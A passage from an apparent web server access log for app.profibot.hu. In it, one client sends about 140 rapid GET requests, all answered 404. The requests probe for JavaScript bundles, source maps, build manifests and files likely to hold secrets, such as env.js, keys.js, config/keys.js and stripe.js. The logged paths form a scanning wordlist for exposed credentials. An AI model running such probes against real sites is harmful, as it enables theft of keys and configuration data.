216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/app.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/_ssgManifest.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/0.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/app/root.tsx" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/webpack-runtime.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/pages/_app.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/js/config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/vendors.app.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/.cache/page-ssr/routes/render-page.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/bundle.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/.svelte-kit/output/client/_app/env.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/pages/_app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/src/constants.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/assets/js/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/src/env.d.ts" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/config.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/bundle.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/assets/vendor.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/src/config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/window.env.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/runtime~main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/.astro/types.d.ts" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/api/settings" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/development/pages/_app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/remix.config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_app/immutable/entry/start.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_astro/hoisted.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/client.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/__ENV.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/checkout" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/js/main.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/config/env.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/main.chunk.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/api/config.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/vite.config.ts" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/settings.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/js/app.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/assets/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/commons.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/webpack.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/5.chunk.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/api.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/checkout.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/public/js/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_app/immutable/chunks/singletons.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/__env.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/framework.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/env.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/constants.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/keys.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/stripe.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/payment.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/vendor.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/bundle.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/static/js/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/public/js/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/public/js/bundle.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/assets/js/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/index.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/js/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/app.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/chunk.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/bundle.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/bundle.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/build/static/js/main.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/assets/index.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/bundle.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/assets/main.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/webpack.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/main.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/app.js.map" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/vendors.app.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/pages/index.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/main.chunk.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/2.chunk.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_nuxt/config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/runtime-main.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/config/keys.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/src/env.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/lib/config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/runtime-config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/env-config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/settings.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/donate" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/asset-manifest.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/.vite/manifest.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/dist/.vite/manifest.json" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/sw.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/workbox.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/webpack.runtime.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/_buildManifest.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/3.chunk.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/1.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/api/config" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/__config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/serviceworker.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/api/v1/config" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/static/js/4.chunk.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/2.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/_next/static/chunks/polyfills.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/assets/index.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/@vite/env" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/vite.config.js" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[25/Jan/2026:21:22:19 +0000] - 404 404 - GET https app.profibot.hu "/@vite/client" [Client 216.81.248.89] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 